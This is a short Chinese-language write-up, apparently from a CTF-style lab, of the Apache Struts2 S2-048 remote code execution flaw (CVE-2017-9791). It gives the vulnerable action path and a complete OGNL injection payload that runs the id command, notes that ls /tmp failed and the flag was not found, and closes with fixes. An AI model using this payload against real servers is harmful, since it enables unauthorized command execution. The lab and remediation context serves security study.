漏洞介绍
名称: struts2-048 远程代码执行 (CVE-2017-9791)
描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 当Struts 2中的Struts 1插件启用的情况下,攻击者通过构造恶意字段可以造成RCE
解题过程
1.打开靶场环境
2.访问漏洞存在的路径 /integration/saveGangster.action
3.在第一个框里输入 ${1+1}进行测试,下面两个框随便填
4.发现1+1被执行了
5.构建命令执行的pyload,执行命令为id
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}
可以看到id被成功执行
6.pwd命令也可以执行成功
7.不知道为什么,ls /tmp执行不了,会报错,暂时没找到获得falg的方法。
修复建议
1.升级建议升级到最新版本
2.根据业务情况,禁用关闭(删除) \struts-2.3.x\apps\struts2-showcase.war包